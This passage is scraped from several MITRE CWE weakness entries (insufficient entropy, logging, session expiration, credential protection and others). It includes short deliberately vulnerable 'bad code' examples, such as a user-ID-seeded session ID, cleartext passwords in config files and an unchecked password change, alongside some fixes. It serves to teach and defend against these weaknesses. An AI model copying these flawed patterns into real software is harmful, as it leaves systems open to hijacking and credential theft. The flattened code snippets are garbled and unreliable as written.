similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following is an actual MySQL error statement: (result)
Example Language: SQL
Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4
The error clearly exposes the database credentials. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure).
CWE-331: Insufficient Entropy
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code generates a unique random identifier for a user's session. (bad code)
Example Language: PHP
function generateSessionID($userID){
srand($userID); }return rand(); Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. This example also exhibits a Small Seed Space (CWE-339). Example 2 The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. (bad code)
Example Language: Java
String GenerateReceiptURL(String baseUrl) {
Random ranGen = new Random(); }ranGen.setSeed((new Date()).getTime()); return(baseUrl + ranGen.nextInt(400000000) + ".html"); This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-332: Insufficient Entropy in PRNG
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-778: Insufficient Logging
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterWhen a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it.
When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds. As organizations adopt cloud storage resources, these technologies often require configuration changes to enable detailed logging information, since detailed logging can incur additional costs. This could lead to telemetry gaps in critical audit logs. For example, in Azure, the default value for logging is disabled. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF). (bad code)
Example Language: XML
<system.serviceModel>
<behaviors> </system.serviceModel><serviceBehaviors>
<behavior name="NewBehavior">
<serviceSecurityAudit auditLogLocation="Default" ...suppressAuditFailure="false" serviceAuthorizationAuditLevel="None" messageAuthenticationAuditLevel="None" /> The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts. Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779). (good code)
Example Language: XML
<system.serviceModel>
<behaviors> </system.serviceModel><serviceBehaviors>
<behavior name="NewBehavior">
<serviceSecurityAudit auditLogLocation="Default"
...suppressAuditFailure="false" serviceAuthorizationAuditLevel="SuccessAndFailure" messageAuthenticationAuditLevel="SuccessAndFailure" /> Example 2 In the following Java example the code attempts to authenticate the user. If the login fails a retry is made. Proper restrictions on the number of login attempts are of course part of the retry functionality. Unfortunately, the failed login is not recorded and there would be no record of an adversary attempting to brute force the program. (bad code)
Example Language: Java
if LoginUser(){
// Login successful
} else {
RunProgram(); // Login unsuccessful
}LoginRetry(); It is recommended to log the failed login action. Note that unneutralized usernames should not be part of the log message, and passwords should never be part of the log message. (good code)
Example Language: Java
if LoginUser(){
// Login successful
} else {
log.warn("Login by user successful."); RunProgram();
// Login unsuccessful
}log.warn("Login attempt by user failed, trying again."); LoginRetry(); Example 3 Consider this command for updating Azure's Storage Logging for Blob service, adapted from [REF-1307]: (bad code)
Example Language: Shell
az storage logging update --account-name --account-key --services b --log d --retention 90
The "--log d" portion of the command says to log deletes. However, the argument does not include the logging of writes and reads. Adding the "rw" arguments to the -log parameter will fix the issue: (good code)
Example Language: Shell
az storage logging update --account-name --account-key --services b --log rwd --retention 90
To enable Azure's storage analytic logs programmatically using PowerShell: (good code)
Example Language: Shell
Set-AzStorageServiceLoggingProperty -ServiceType Queue -LoggingOperations read,write,delete -RetentionDays 5 -Context $MyContextObject
Notice that here, the retention has been limited to 5 days. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-613: Insufficient Session Expiration
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterAccording to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire. (bad code)
Example Language: Java
<web-app>
[...snipped...]
<session-config> <session-timeout>-1</session-timeout> </session-config>
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.
CWE-345: Insufficient Verification of Data Authenticity
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors did not sign firmware images. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
"origin validation" could fall under this.
Maintenance
The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a category.
CWE-522: Insufficiently Protected Credentials
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code changes a user's password. (bad code)
Example Language: PHP
$user = $_GET['user'];
$pass = $_GET['pass']; $checkpass = $_GET['checkpass']; if ($pass == $checkpass) { SetUserPassword($user, $pass); }While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. Example 2 The following code reads a password from a properties file and uses the password to connect to a database. (bad code)
Example Language: Java
...
Properties prop = new Properties(); prop.load(new FileInputStream("config.properties")); String password = prop.getProperty("password"); DriverManager.getConnection(url, usr, password); ... This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. Example 3 The following code reads a password from the registry and uses the password to create a new network credential. (bad code)
Example Language: Java
...
String password = regKey.GetValue(passKey).toString(); NetworkCredential netCred = new NetworkCredential(username,password,domain); ... This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system Example 4 Both of these examples verify a password by comparing it to a stored compressed version. (bad code)
Example Language: C
int VerifyAdmin(char *password) {
if (strcmp(compress(password), compressed_password)) { }printf("Incorrect Password!\n"); }return(0); printf("Entering Diagnostic Mode...\n"); return(1); (bad code)
Example Language: Java
int VerifyAdmin(String password) {
if (passwd.Equals(compress(password), compressed_password)) { }return(0); }//Diagnostic Mode return(1); Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database. Example 5 The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. This Java example shows a properties file with a cleartext username / password pair. (bad code)
Example Language: Java
# Java Web App ResourceBundle properties file ... webapp.ldap.username=secretUsername webapp.ldap.password=secretPassword ... The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. (bad code)
Example Language: ASP.NET
...
<connectionStrings> <add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /> </connectionStrings>... Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. Example 6 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors used cleartext transmission or storage of passwords in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-436: Interpretation Conflict
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterProduct A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.
This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The paper "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences. Example 2 Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-382: J2EE Bad Practices: Use of System.exit()
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception. (bad code)
Example Language: Java
Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try { }... } catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString()); }System.exit(1);
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-5: J2EE Misconfiguration: Data Transmission Without Encryption
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterInformation sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other If an application uses SSL to guarantee confidential communication with client browsers, the application configuration should make it impossible to view any access controlled page without SSL. There are three common ways for SSL to be bypassed:
CWE-322: Key Exchange without Entity Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product performs a key exchange with an actor without verifying the identity of that actor.
Performing a key exchange will preserve the integrity of the information sent between two entities, but this will not guarantee that the entities are who they claim they are. This may enable an attacker to impersonate an actor by modifying traffic between the two entities. Typically, this involves a victim client that contacts a malicious server that is impersonating a trusted server. If the client skips authentication or ignores an authentication failure, the malicious server may request authentication information from the user. The malicious server can then use this authentication information to log in to the trusted server using the victim's credentials, sniff traffic between the victim and trusted server, etc.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Many systems have used Diffie-Hellman key exchange without authenticating the entities exchanging keys, allowing attackers to influence communications by redirecting or interfering with the communication path. Many people using SSL/TLS skip the authentication (often unknowingly).
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE CATEGORY: Key Management Errors
CWE-115: Misinterpretation of Input
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
